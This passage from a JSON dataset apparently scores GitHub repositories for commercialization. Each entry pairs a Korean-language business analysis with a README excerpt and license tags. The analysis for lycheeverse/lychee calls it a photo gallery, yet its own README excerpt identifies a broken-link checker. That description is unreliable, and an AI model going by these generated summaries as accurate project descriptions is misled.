layout programmatically\nTypeLayout layout = TypeLayout.GetLayout<YourType>();\nConsole.WriteLine(layout);\n```\n\nExample output:\n\n```\nType layout for 'NotAlignedStruct'\nSize: 12 bytes. Paddings: 4 bytes (%33 of empty space)\n|====================","composite_score":0.0125,"license_safety_tag":"safe"},{"name":"bmoeskau/engineering-ladders","github_url":"https://github.com/bmoeskau/engineering-ladders","stars":19,"language":"","license":"MIT","abandonment_months":1,"description":"# Engineering Ladders 분석\n\n## 왜 보물인가\n회사에서 직원들이 어떤 기준으로 승진하고 급여가 올라가는지를 투명하게 보여주는 시스템으로, 조직 문화가 중요한 기업들이 매우 선호합니다.\n\n## 어디에 쓸 수 있나\n1. **HR 관리 SaaS**: 중소 스타트업들이 직급 체계와 평가 기준을 자동으로 구성하고 관리하는 클라우드 서비스로 판매\n2","readme_excerpt":"# Engineering Ladders\n\nA collection of engineering career ladders for reference and inspiration.\n\n- [Artsy](https://artsy.github.io/blog/2015/04/03/artsy-engineering-compensation-framework/)\n- [Axelerant](https://www.axelerant.com/blog/how-to-design-an-effective-career-ladder-for-engineers)\n- [Basecamp](https://github.com/basecamp/handbook/blob/master/titles-for-programmers.md)\n- [Buffer](https://buffer.com/resources/engineering-career-framework/)\n- [Capgemini](https://capgemini.github.io/grade-ladder/)\n- [Carta](https://medium.com/building-carta/engineering-levels-at-carta-d33db2a55a20)\n- [CircleCI](https://circleci.com/blog/why-we-re-designed-our-engineering-career-paths-at-circleci/)\n- [Dropbox](https://dropbox.github.io/dbx-career-framework/)\n- [Envoy](https://github.com/envoy/Engineering/blob/master/engineering_bands.md)\n- [Etsy](https://etsy.github.io/Etsy-Engineering-Career-Ladder/)\n- [Financial Times](https://github.com/Financial-Times/engineering-progression)\n- [Fog Creek](htt","composite_score":0.0125,"license_safety_tag":"safe"},{"name":"rocketshipapps/adblockfast","github_url":"https://github.com/rocketshipapps/adblockfast","stars":7,"language":"Objective-C","license":"gpl-3.0","abandonment_months":1,"description":"# AdblockFast 저장소 분석\n\n## 왜 보물인가\n광고 차단 기술을 통해 웹 서핑 속도를 빠르게 만들 수 있는 소프트웨어로, 많은 사람들이 원하는 '빠른 인터넷 환경'을 직접 제공할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **브라우저 확장 프로그램 판매 서비스**: 크롬, 파이어폭스 등 주요 브라우저에서 월간 구독형으로 제공\n2. **기업용 ","readme_excerpt":"# ![Adblock Fast](assets/promo/adblockfast-optimized.png) [![Tweet](assets/promo/tweet-optimized.png)](https://twitter.com/intent/tweet?text=Get%20a%20faster%20ad%20blocker%20for%20Windows,%20Android,%20iOS,%20or%20Chrome:&url=https://adblockfast.com/?ref=GitHub&via=adblockfast)\n\n*A faster ad blocker for Windows, Android, iOS, [and] Chrome<del>, and Opera</del>!*\n\nTry Adblock Fast:\n\n* [Windows](https://desktop.adblockfast.com/?ref=GitHub) (Windows 7 and up)\n* [Android](https://play.google.com/store/apps/details?id=com.rocketshipapps.adblockfast) (Android\n  5.0 and up with Samsung Internet 4.0 and up)\n* [iOS](https://itunes.apple.com/app/adblock-fast/id1032930802?at=1001lwfP) (iOS 9 and up on 64-bit\n  devices, iPhone 5s and up and iPad mini 2 and up)\n* [Chrome](https://chrome.google.com/webstore/detail/adblock-fast/nneejgmhfoecfeoffakdnolopppbbkfi)\n* ~~Opera~~\n\nJust as webpages grew bloated with ads, so too have ad blockers grown bloated with little-used\nfiltering rules and features tha","composite_score":0.0125,"license_safety_tag":"restricted"},{"name":"o2sh/onefetch","github_url":"https://github.com/o2sh/onefetch","stars":8,"language":"Rust","license":"MIT","abandonment_months":0,"description":"# o2sh/onefetch 프로젝트 분석\n\n## 왜 보물인가\n깃허브 저장소의 정보를 한눈에 시각적으로 보여주는 도구로, 개발팀이 프로젝트를 빠르게 파악하고 공유할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **개발팀 협업 플랫폼**: 팀원들이 각 프로젝트의 최신 상태(언어, 업데이트 일자, 기여자)를 자동으로 조회할 수 있는 대시보드 서비스\n2.","readme_excerpt":"<div align=\"center\">\n\n# Onefetch - Command-line Git information tool\n\n<p><img src=\"assets/onefetch.svg\" height=\"100\" alt=\"Onefetch logo\"></p>\n\n[![Crates.io Version](https://img.shields.io/crates/v/onefetch)](https://crates.io/crates/onefetch)\n[![GitHub Actions Workflow Status](https://img.shields.io/github/actions/workflow/status/o2sh/onefetch/ci.yml)](https://github.com/o2sh/onefetch/actions/workflows/ci.yml)\n[![help wanted](https://img.shields.io/github/issues/o2sh/onefetch/help%20wanted?color=green)](https://github.com/o2sh/onefetch/issues?q=is%3Aissue+is%3Aopen+label%3A%22help+wanted%22)\n![MSRV](assets/msrv-badge.svg)\n\n<h3>\n<a href=\"https://onefetch.dev/\">Homepage</a> |\n<a href=\"https://github.com/o2sh/onefetch/wiki/Installation\">Installation</a> |\n<a href=\"https://github.com/o2sh/onefetch/wiki/\">Documentation</a>\n</h3>\n\n</div>\n\n---\n\nOnefetch is a command-line Git information tool that displays project information and code statistics for a local Git repository directly in your term","composite_score":0.0125,"license_safety_tag":"safe"},{"name":"OpenPrinting/cups","github_url":"https://github.com/OpenPrinting/cups","stars":12,"language":"C","license":"apache-2.0","abandonment_months":0,"description":"# OpenPrinting/cups 저장소 분석\n\n## 왜 보물인가\n프린터와 인쇄 장치를 컴퓨터에서 쉽게 사용할 수 있게 만드는 핵심 기술로, 리눅스와 맥 운영체제에서 거의 표준처럼 사용되고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 인쇄 서비스**: 어디서나 프린터를 찾아 문서를 인쇄할 수 있는 웹 기반 서비스로 운영\n2. **회사 내부 IT","readme_excerpt":"OpenPrinting CUPS v2.5b1\n========================\n\n![Version](https://img.shields.io/github/v/release/openprinting/cups?include_prereleases)\n![Apache 2.0](https://img.shields.io/github/license/openprinting/cups)\n[![Build and Test](https://github.com/OpenPrinting/cups/workflows/Build%20and%20Test/badge.svg)](https://github.com/OpenPrinting/cups/actions/workflows/build.yml)\n[![Coverity Scan](https://img.shields.io/coverity/scan/23806)](https://scan.coverity.com/projects/openprinting-cups)\n\n> *Note:* This branch is tracking a future CUPS 2.5.x feature release.  Check\n> out the \"2.4.x\" branch for CUPS 2.4.x.\n\n\nIntroduction\n------------\n\nOpenPrinting CUPS is the most current version of CUPS, a standards-based, open\nsource printing system for Linux® and other Unix®-like operating systems.  CUPS\nsupports printing to:\n\n- [AirPrint™][1] and [IPP Everywhere™][2] printers,\n- Network and local (USB) printers with Printer Applications, and\n- Network and local (USB) printers with (legacy) PPD-based ","composite_score":0.0124,"license_safety_tag":"safe"},{"name":"thirtybees/thirtybees","github_url":"https://github.com/thirtybees/thirtybees","stars":12,"language":"PHP","license":"unknown","abandonment_months":0,"description":"# thirtybees 저장소 분석\n\n## 왜 보물인가\n작은 온라인 가게들이 Amazon이나 쿠팡처럼 자신의 쇼핑몰을 쉽게 만들고 운영할 수 있도록 해주는 무료 플랫폼입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 소상공인 대상 월 구독형 쇼핑몰 빌더로 월 결제 모델 운영\n2. **내부 업무 도구**: 기존 쇼핑몰 운영 회사가 자사 고객을","readme_excerpt":"# thirty bees\n[![Crowdin](https://d322cqt584bo4o.cloudfront.net/thirty-bees/localized.svg)](https://crowdin.com/project/thirty-bees)\n[![Forum](https://img.shields.io/badge/forum-thirty%20bees-brightgreen.svg)](https://forum.thirtybees.com/discover/)\n\nthirty bees is a matured e-commerce solution which once started as a fork of PrestaShop 1.6.1.11 and is still compatible with (almost) all PS 1.6 modules. Its focus is on stability, correctness and reliability of the rich feature set, to allow merchants to focus on growing their business.\n\n## Supporters\n\nthirty bees is commited to being free and open source. We are also committed to making all software that thirty bees develops free and open source. For that reason we have setup a Backers page so our community can help support us. Please feel free to [sign-up](https://forum.thirtybees.com/support-thirty-bees/) as a backer to help support ThirtyBees so it can grow and thrive!\n\n![thirty bees screenshot](docs/thirty-bees-screenshot.jpeg)\n\n## ","composite_score":0.0123,"license_safety_tag":"unknown"},{"name":"yued-fe/lulu","github_url":"https://github.com/yued-fe/lulu","stars":22,"language":"JavaScript","license":"MIT","abandonment_months":0,"description":"# yued-fe/lulu 상용화 분석\n\n## 왜 보물인가\n웹 애플리케이션의 사용자 인터페이스를 빠르게 만들 수 있는 개발 도구로, 개발 생산성을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n스타트업이 웹 기반 협업 도구나 프로젝트 관리 서비스를 개발할 때 개발 속도를 2-3배 빠르게 할 수 있습니다.\n\n**2. 내","readme_excerpt":"<p align=\"center\">\n  <img src=\"https://imgservices-1252317822.image.myqcloud.com/image/093020210104728/9999e481.svg\" width=\"227\" height=\"98\">\n</p>\n<p align=\"center\">追本溯源，穿越沉浮</p>\n<p align=\"center\">\n    <img src=\"https://img.shields.io/npm/v/lu2.svg\" height=\"20\"> <img src=\"https://img.shields.io/npm/l/lu2\" height=\"20\">\n</p>\n\n# LuLu UI\n\nLuLu UI 是阅文集团荣誉出品的前端 UI 组件库。\n\n形象气质如下图，柔软亲近，使用简单灵活，适用场景广泛，适合面向外部用户的 PC 网站，或者需要轻量与敏捷的项目。\n\n<img data-src=\"https://qidian.gtimg.com/lulu/modern/css/common/images/temp/figure.png\" width=\"122\" height=\"137\" src=\"https://imgservices-1252317822.image.myqcloud.com/coco/s06052023/01633c5c.0dk4w0.png\">\n\n## 开发\n\n拉取完整项目，包括 gh-pages 分支，然后执行下面的语句即可开发：\n\n```js\n// 所有主题\nnode run\n```\n\n也可以只启动某一个主题，例如：\n\n```js\n// Edge主题\nnode run edge\n```\n```js\n// Hope主题\nnode run hope\n```\n\n对应主题的演示兼文档页面的本地访问入口：\n\n* Pure主题：http://localhost:10086/docs/pure/about.use.html\n* Edge主题：http://localhost:10086/docs/edge/about.use.html\n* Hope主题：http://localhost:10086/docs/hope/about.html\n\n此时，修改项目的 JS 和 CSS 文件，","composite_score":0.0123,"license_safety_tag":"safe"},{"name":"microsoft/winget-create","github_url":"https://github.com/microsoft/winget-create","stars":7,"language":"C#","license":"MIT","abandonment_months":1,"description":"# microsoft/winget-create 분석 리포트\n\n## 왜 보물인가\n마이크로소프트가 직접 만든 공식 도구로, Windows 프로그램 설치 시스템을 쉽게 관리할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **기업용 SaaS**: 회사에서 직원들의 컴퓨터에 프로그램을 일괄 설치·관리하는 서비스\n2. **내부 업무 도구**: IT 담당자가 회","readme_excerpt":"\n# Welcome to the Windows Package Manager Manifest Creator repository.\n\nThis repository contains the source code for the Windows Package Manager Manifest Creator.  The  Windows Package Manager Manifest Creator is designed to help generate or update manifest files for the [Community repo](https://github.com/microsoft/winget-pkgs).\n\n## Overview\n\n**Windows Package Manager Manifest Creator** is an Open Source tool designed to help developers create, update, and submit manifest files to the [Windows Package Manager repository](https://github.com/microsoft/winget-pkgs).\n\nDevelopers will use this tool to submit their applications for use with the [Windows Package Manager](https://docs.microsoft.com/windows/package-manager/).\n\n## Getting Started\n\nFor your convenience, **WingetCreate** can be acquired a number of ways.\n\n### Install from the github repo\n\nThe **Windows Package Manager Manifest Creator** is available for download from the [winget-create](https://github.com/microsoft/winget-create/","composite_score":0.0122,"license_safety_tag":"safe"},{"name":"blockscout/blockscout-rs","github_url":"https://github.com/blockscout/blockscout-rs","stars":222,"language":"Rust","license":"NOASSERTION","abandonment_months":0,"description":"","readme_excerpt":"","composite_score":0.0122,"license_safety_tag":"unknown"},{"name":"learnk8s/kubernetes-production-best-practices","github_url":"https://github.com/learnk8s/kubernetes-production-best-practices","stars":6,"language":"","license":"MIT","abandonment_months":0,"description":"# Kubernetes Production Best Practices 분석\n\n## 왜 보물인가\n온라인 서비스를 안정적으로 운영하는 데 필요한 실무 지식을 체계적으로 정리해놓은 가이드라서, 개발팀이 참고하면 서비스 장애를 미리 예방할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 웹사이트나 앱 기반 구독형 서비스를 운영하는 회사가 서비","readme_excerpt":"# Kubernetes production readiness checklist\n\n![Kubernetes production best practices](preview.png)\n\nThis is a free, open checklist to help you deploy your applications to Kubernetes.\n\nNo form, email, or download is required. Use it in the browser, share it with your team, or adapt it for your own internal review.\n\n![](./prod-best-practices.gif)\n\n**Topics**\n\n- [Your application](01-your-application.md)\n- [Your Kubernetes manifests](02-your-manifests.md)\n- [Your security](03-your-security.md)\n- [Scaling](04-scaling.md)\n- [Going live](05-going-live.md)\n","composite_score":0.0122,"license_safety_tag":"safe"},{"name":"BlueMap-Minecraft/BlueMap","github_url":"https://github.com/BlueMap-Minecraft/BlueMap","stars":6,"language":"Java","license":"MIT","abandonment_months":0,"description":"# BlueMap-Minecraft 상용화 분석\n\n## 왜 보물인가\n마인크래프트 게임 세계를 웹에서 실시간으로 보고 탐색할 수 있는 지도 도구로, 게임 커뮤니티와 서버 운영자들에게 높은 수요가 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: \"마인크래프트 서버 지도 호스팅\" 구독 서비스 (서버 주인들이 자신의 게임 세계를 웹사이트에 자","readme_excerpt":"[![title-banner](https://bluecolored.de/paste/BluemapBanner.png)](https://bluemap.bluecolored.de/)\n\n<div align=\"center\">\n\ncreate **3D**-maps of your Minecraft worlds and display them in your browser  \n**>> [DEMO MAP](https://bluecolored.de/bluemap) <<**\n\n\n[![GitHub issues](https://img.shields.io/github/issues-raw/BlueMap-Minecraft/BlueMap)](https://github.com/orgs/BlueMap-Minecraft/projects/2)\n[![GitHub all releases](https://img.shields.io/github/downloads/BlueMap-Minecraft/BlueMap/total)](https://github.com/BlueMap-Minecraft/BlueMap/releases)\n[![GitHub release (latest by date)](https://img.shields.io/github/v/release/BlueMap-Minecraft/BlueMap)](https://github.com/BlueMap-Minecraft/BlueMap/releases/latest)\n[![Discord](https://img.shields.io/discord/665868367416131594?label=discord)](https://discord.gg/zmkyJa3)\n\n</div>\n\n<br>\n<br>\n\n## What is BlueMap\nBlueMap is a program that reads your Minecraft world files and generates not only a map, but also 3D-models of the whole surface.\nWith the ","composite_score":0.0121,"license_safety_tag":"safe"},{"name":"open-telemetry/opentelemetry-ruby","github_url":"https://github.com/open-telemetry/opentelemetry-ruby","stars":7,"language":"Ruby","license":"apache-2.0","abandonment_months":0,"description":"# OpenTelemetry Ruby 저장소 분석\n\n## 왜 보물인가\n소프트웨어 시스템의 움직임을 투명하게 보여주는 국제 표준 기술로, 기업들이 자신의 서비스가 제대로 작동하는지 파악하는 데 필수적인 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 모니터링 플랫폼**: 고객사의 애플리케이션 성능을 실시간으로 추적하고 장애를 신속하게 감지하는 서비스\n","readme_excerpt":"# OpenTelemetry Ruby\n\n[![Slack channel][slack-image]][slack-url]\n[![CI][ci-image]][ci-image]\n[![Apache License][license-image]][license-image]\n\nThe Ruby [OpenTelemetry](https://opentelemetry.io/) client.\n\n- [Getting Started][getting-started]\n- [Contributing](#contributing)\n- [Contrib Repository](#contrib-repository)\n- [Instrumentation Libraries][contrib-instrumentations]\n- [Versioning](#versioning)\n- [Useful links](#useful-links)\n- [License](#license)\n\n## Contributing\n\nWe'd love your help! Use tags [good first issue][issues-good-first-issue] and\n[help wanted][issues-help-wanted] to get started with the project.\n\nPlease review the [contribution instructions](CONTRIBUTING.md) for important\ninformation on setting up your environment, running the tests, and opening pull\nrequests.\n\nThe Ruby special interest group (SIG) meets regularly. See the OpenTelemetry\n[community page][ruby-sig] repo for information on this and other language SIGs.\n\n### Maintainers\n\n- [Daniel Azuma](https://github.com/","composite_score":0.0121,"license_safety_tag":"safe"},{"name":"acgeospatial/awesome-earthobservation-code","github_url":"https://github.com/acgeospatial/awesome-earthobservation-code","stars":5,"language":"HTML","license":"CC0-1.0","abandonment_months":0,"description":"# awesome-earthobservation-code 평가\n\n## 왜 보물인가\n위성 사진과 지도 데이터를 분석하는 코드들을 모아놓은 자료집으로, 환경 모니터링·도시 계획·농업 분야에서 실제로 쓸 수 있는 도구들의 종합 가이드입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 부동산 중개사가 구독하여 지역의 개발 가능성을 위성 데이터로 자동","readme_excerpt":"# Awesome-EarthObservation-Code\n\nA curated list of awesome tools, tutorials, code, helpful projects, links, stuff about Earth Observation and Geospatial stuff!\n\nPlease note that this is <b>not</b> offically an awesome list.\n\n## Latest news\n\n<b> Update May 2026</b> Any links to my (old) website will cease this month - the old blogs are archive in another repo. If you want the latest news in EO I recommend [Spectral Reflectance](https://www.spectralreflectance.space/). My self employment ended in March 2026 but my love and joy for all things EO has not you can find me on LinkedIn [Andrew Cutts](https://www.linkedin.com/in/andrewcutts/)\n\n<b> A note of caution </b> During the QC of links I note that the vast majority are 2years+ old or considerably older. Some repos are retired and still visible, some code is > 10 years old. Tread carefully. This list is open to PR's and suggestions, it is updated infrequently by myself. If you find a link that is helpful, share it! We have 1.3k stars now ","composite_score":0.012,"license_safety_tag":"unknown"},{"name":"hakandundar34coding/system-monitoring-center","github_url":"https://github.com/hakandundar34coding/system-monitoring-center","stars":7,"language":"Python","license":"GPL-3.0","abandonment_months":1,"description":"# system-monitoring-center 분석\n\n## 왜 보물인가\n컴퓨터 상태를 실시간으로 감시하고 문제를 미리 알려주는 도구로, 기업의 서버 관리 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **클라우드 모니터링 SaaS**: 기업의 서버 상태를 원격으로 24시간 감시하고 장애 발생 시 자동 알림을 보내는 구독형 서비스\n2. ","readme_excerpt":"# System Monitoring Center\n\n<p align=\"center\">\n    <img src=\"https://github.com/hakandundar34coding/system-monitoring-center/blob/master/data/icons/hicolor/scalable/apps/system-monitoring-center.svg\" width=\"100\">\n</p>\n\n\n<p align=\"center\">\n    <strong>\n        Multi-featured system monitor\n    </strong>\n</p>\n\n\n<p align=\"center\">\n    <strong>\n        <a href=\"https://github.com/hakandundar34coding/system-monitoring-center/tree/smc_v1\">SMC v1.43.12 (GTK3)</a> | <a href=\"https://github.com/hakandundar34coding/system-monitoring-center/tree/smc_v2\">SMC v2.26.0 (GTK3/4)</a> | <a href=\"https://github.com/hakandundar34coding/system-monitoring-center\">SMC v3 (Tk)</a>\n    </strong>\n</p>\n\n\n<p align=\"center\">\n    <a href=\"https://github.com/hakandundar34coding/system-monitoring-center/tags\">\n        <img alt=\"Platform (GNU/Linux)\" src=\"https://img.shields.io/badge/platform-GNU/Linux-blue.svg\"/>\n    </a>\n    <a href=\"https://github.com/hakandundar34coding/system-monitoring-center/tags\">\n        <img","composite_score":0.0117,"license_safety_tag":"restricted"},{"name":"pacstall/pacstall","github_url":"https://github.com/pacstall/pacstall","stars":6,"language":"Shell","license":"GPL-3.0","abandonment_months":1,"description":"# Pacstall 저장소 분석\n\n## 왜 보물인가\n리눅스 사용자들이 소프트웨어를 설치하고 관리하는 과정을 단순화해주는 도구로, 기술 초심자도 쉽게 프로그램을 설치할 수 있게 합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 클라우드 기반 리눅스 환경 관리 플랫폼에 통합하여 사용자가 원클릭으로 필요한 프로그램을 설치하게 제공\n- **내부 업무","readme_excerpt":"<p align=\"center\">\n<a href=\"https://github.com/pacstall/pacstall/releases/latest\"><img src=\"https://img.shields.io/github/v/release/pacstall/pacstall?color=red&style=flat-square\"></a>\n<a href=\"https://www.gnu.org/software/bash/\"><img src=\"https://img.shields.io/badge/bash-v5-brightgreen?style=flat-square&logo\" alt=\"Bash v5\"></a>\n  <a href=\"https://github.com/pacstall/pacstall/issues\"><img src=\"https://img.shields.io/github/issues/pacstall/pacstall?style=flat-square\"></a>\n<a href=\"https://github.com/pacstall/pacstall/actions?query=workflow%3A%22test+install+script%22\"><img src=\"https://img.shields.io/github/actions/workflow/status/pacstall/pacstall/remote-bash.yml?branch=master&style=flat-square\"></a>\n<a href=\"https://www.codefactor.io/repository/github/pacstall/pacstall\"><img src=\"https://img.shields.io/codefactor/grade/github/pacstall/pacstall/develop?style=flat-square\"></a>\n<a href=\"https://github.com/pacstall/pacstall-programs\"><img src=\"https://img.shields.io/github/commit-activity","composite_score":0.0117,"license_safety_tag":"restricted"},{"name":"elixir-grpc/grpc","github_url":"https://github.com/elixir-grpc/grpc","stars":5,"language":"Elixir","license":"Apache-2.0","abandonment_months":0,"description":"# elixir-grpc/grpc 분석 보고서\n\n## 왜 보물인가\n서로 다른 프로그램들이 빠르고 안정적으로 대화할 수 있게 해주는 통신 기술로, 금융·전자상거래·클라우드 서비스 같은 대규모 시스템에서 필수적입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 여러 마이크로서비스(작은 프로그램들)를 연결해 음악 스트리밍, 협업 도구 등을 운영하는","readme_excerpt":"# gRPC Elixir\n\n[![GitHub CI](https://github.com/elixir-grpc/grpc/actions/workflows/ci.yml/badge.svg)](https://github.com/elixir-grpc/grpc/actions/workflows/ci.yml)\n[![Hex.pm](https://img.shields.io/hexpm/v/grpc.svg)](https://hex.pm/packages/grpc)\n[![Hex Docs](https://img.shields.io/badge/hex-docs-lightgreen.svg)](https://hexdocs.pm/grpc/)\n[![License](https://img.shields.io/hexpm/l/grpc.svg)](https://github.com/elixir-grpc/grpc/blob/master/LICENSE)\n[![Total Downloads](https://img.shields.io/hexpm/dt/grpc.svg)](https://hex.pm/packages/grpc)\n[![Last Updated](https://img.shields.io/github/last-commit/elixir-grpc/grpc.svg)](https://github.com/elixir-grpc/grpc/commits/master)\n\n**gRPC Elixir** is a full-featured Elixir implementation of the [gRPC](https://grpc.io) protocol, supporting unary and streaming RPCs, interceptors, HTTP transcoding, and TLS. This version adopts a unified stream-based model for all types of calls.\n\n## Table of contents\n\n- [Installation](#installation)\n- [Protobuf Code","composite_score":0.0115,"license_safety_tag":"safe"},{"name":"hperrin/svelte-material-ui","github_url":"https://github.com/hperrin/svelte-material-ui","stars":5,"language":"Svelte","license":"Apache-2.0","abandonment_months":0,"description":"# Svelte Material UI 저장소 분석\n\n## 왜 보물인가\n웹사이트나 앱을 만들 때 필요한 \"예쁜 버튼, 메뉴, 입력창\" 등을 미리 만들어둔 재사용 가능한 부품 모음집입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 회계 관리, 프로젝트 협업 도구 등 기업용 웹 서비스의 사용자 인터페이스를 빠르게 구축할 수 있습니다.\n\n2. *","readme_excerpt":"<div align=\"center\">\n  <img src=\"packages/site/static/header-transparent.png\" alt=\"Svelte Material UI\" />\n</div>\n\nA library of Svelte Material UI components, based on [Material Design Components - Web](https://github.com/material-components/material-components-web).\n\n# Demos, Code Samples, and Guides\n\nhttps://sveltematerialui.com\n\n# Features\n\nHere are some unique features that help SMUI stand out:\n\n- Full TypeScript support, including HTML attributes.\n- You can add arbitrary attributes to all of the components and many of the elements within them.\n- You can add actions to the components with `use={[Action1, [Action2, action2Props], Action3]}`.\n- You can add props to lower components and elements with \"$\" props, like `input$maxlength=\"15\"`.\n- SMUI [supports RTL languages](https://svelte.dev/repl/c2ff2d5dd5404eccb901ba04ef0161be).\n\n# Installation\n\nTo get started, check out the [installation docs](INSTALL.md) or the [SvelteKit docs](SVELTEKIT.md).\n\n# Need Help?\n\nIf you need help installin","composite_score":0.0113,"license_safety_tag":"safe"},{"name":"saltbo/zpan","github_url":"https://github.com/saltbo/zpan","stars":6,"language":"TypeScript","license":"AGPL-3.0","abandonment_months":0,"description":"# saltbo/zpan 비즈니스 분석\n\n## 왜 보물인가\n개인이나 팀이 자신의 클라우드 저장소를 직접 만들고 운영할 수 있는 오픈소스 도구로, 비싼 구독료를 내지 않고도 구글 드라이브 같은 서비스를 구축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업용 파일 공유 플랫폼으로 월 결제 구독 모델로 운영하며 기업 고객에게 판매","readme_excerpt":"# ZPan\n\n**The open-source, S3-native file hosting platform.**\n\n[![CI](https://github.com/saltbo/zpan/actions/workflows/ci.yml/badge.svg)](https://github.com/saltbo/zpan/actions/workflows/ci.yml)\n[![codecov](https://codecov.io/gh/saltbo/zpan/graph/badge.svg)](https://codecov.io/gh/saltbo/zpan)\n[![Release](https://github.com/saltbo/zpan/actions/workflows/release.yml/badge.svg)](https://github.com/saltbo/zpan/actions/workflows/release.yml)\n[![GitHub Release](https://img.shields.io/github/v/release/saltbo/zpan)](https://github.com/saltbo/zpan/releases/latest)\n[![Docker Image](https://img.shields.io/badge/ghcr.io-saltbo%2Fzpan-blue)](https://ghcr.io/saltbo/zpan)\n[![License](https://img.shields.io/github/license/saltbo/zpan.svg)](https://github.com/saltbo/zpan/blob/master/LICENSE)\n\n> Image bed, file sharing, and backup — powered by S3, deployed anywhere.\n\n## What is ZPan?\n\nZPan is a lightweight file hosting platform built on top of S3-compatible storage. Files upload directly from the client","composite_score":0.0113,"license_safety_tag":"risky"},{"name":"eBay/nice-modal-react","github_url":"https://github.com/eBay/nice-modal-react","stars":65,"language":"TypeScript","license":"MIT","abandonment_months":1,"description":"# eBay/nice-modal-react 분석 보고서\n\n## 왜 보물인가\n웹사이트에서 팝업창이나 대화상자를 쉽게 만들 수 있게 해주는 도구로, 개발자들의 반복 작업을 크게 줄여줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 회원가입, 결제, 알림 등 팝업이 필요한 웹 애플리케이션에 내장\n2. **내부 업무 도구**: 회사 직원들이 사용하","readme_excerpt":"# Nice Modal\n\nA small, zero-dependency utility for managing modals in React. It uses context to persist modal state globally so that you can easily show/hide modals either by the modal component or by id.\n\n> You can also see the introduction at [eBay tech blog](https://medium.com/ebaytech/rethink-modals-management-in-react-cf3b6804223d).\n> \n> ***Also check out another nice utility from us! [nice-form-react](https://github.com/eBay/nice-form-react)! 😜***\n\n[![NPM](https://img.shields.io/npm/v/@ebay/nice-modal-react.svg)](https://www.npmjs.com/package/@ebay/nice-modal-react)\n[![Downloads](https://img.shields.io/npm/dm/@ebay/nice-modal-react.svg)](https://www.npmjs.com/package/@ebay/nice-modal-react)\n[![Build Status](https://api.travis-ci.com/eBay/nice-modal-react.svg?branch=main)](https://app.travis-ci.com/github/eBay/nice-modal-react)\n[![Coverage Status](https://codecov.io/gh/ebay/nice-modal-react/branch/main/graph/badge.svg)](https://codecov.io/github/eBay/nice-modal-react)\n[![Demo](htt","composite_score":0.0112,"license_safety_tag":"safe"},{"name":"lycheeverse/lychee","github_url":"https://github.com/lycheeverse/lychee","stars":10,"language":"Rust","license":"Apache-2.0","abandonment_months":0,"description":"# Lycheeverse/Lychee 분석 보고서\n\n## 왜 보물인가\n사진과 이미지를 쉽게 정리하고 공유할 수 있는 개인용 갤러리 시스템으로, 누구나 자신의 사진 저장소를 직접 운영할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **사진 정리 SaaS**: 가족 사진을 클라우드에 저장하고 공유하는 월 구독 서비스\n2. **기업 자산 관리 도구**: 제조업","readme_excerpt":"<div align=\"center\">\n\n<a name=\"back-to-top\"></a>\n![lychee](assets/logo.svg)\n\n[![Homepage](https://img.shields.io/badge/Homepage-Online-EA3A97)](https://lychee.cli.rs/)\n[![GitHub Marketplace](https://img.shields.io/badge/Marketplace-lychee-blue.svg?colorA=24292e&colorB=0366d6&style=flat&longCache=true&logo=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAA4AAAAOCAYAAAAfSC3RAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAM6wAADOsB5dZE0gAAABl0RVh0U29mdHdhcmUAd3d3Lmlua3NjYXBlLm9yZ5vuPBoAAAERSURBVCiRhZG/SsMxFEZPfsVJ61jbxaF0cRQRcRJ9hlYn30IHN/+9iquDCOIsblIrOjqKgy5aKoJQj4O3EEtbPwhJbr6Te28CmdSKeqzeqr0YbfVIrTBKakvtOl5dtTkK+v4HfA9PEyBFCY9AGVgCBLaBp1jPAyfAJ/AAdIEG0dNAiyP7+K1qIfMdonZic6+WJoBJvQlvuwDqcXadUuqPA1NKAlexbRTAIMvMOCjTbMwl1LtI/6KWJ5Q6rT6Ht1MA58AX8Apcqqt5r2qhrgAXQC3CZ6i1+KMd9TRu3MvA3aH/fFPnBodb6oe6HM8+lYHrGdRXW8M9bMZtPXUji69lmf5Cmamq7quNLFZXD9Rq7v0Bpc1o/tp0fisAAAAASUVORK5CYII=)](https://github.com/marketplace/actions/lychee-broken-link-checker)\n[![Rust](https://github.com/lycheeverse/lychee/workflows/CI/b","composite_score":0.0112,"license_safety_tag":"safe"},{"name":"uhub/awesome-coq","github_url":"https://github.com/uhub/awesome-coq","stars":5,"language":"","license":"unknown","abandonment_months":1,"description":"# uhub/awesome-coq 분석\n\n## 왜 보물인가\n수학 증명을 컴퓨터로 자동 검증하는 Coq 프로그래밍 언어 관련 자료들을 한곳에 모아놓은 학습 가이드입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: Coq 학습자를 위한 구조화된 커리큘럼과 자료 제공 구독 서비스\n2. **기업 연수 프로그램**: 소프트웨어 개발사의 검증 기술 ","readme_excerpt":"# awesome-coq\n\nA curated list of awesome Coq frameworks, libraries and software.\n\n* [AbsInt/CompCert](https://github.com/AbsInt/CompCert) - The CompCert formally-verified C compiler\n* [HoTT/Coq-HoTT](https://github.com/HoTT/Coq-HoTT) - A Coq library for Homotopy Type Theory\n* [UniMath/UniMath](https://github.com/UniMath/UniMath) - This rocq library aims to formalize a substantial body of mathematics using the univalent point of view.\n* [magmide/magmide](https://github.com/magmide/magmide) - A dependently-typed proof language intended to make provably correct bare metal code possible for working software 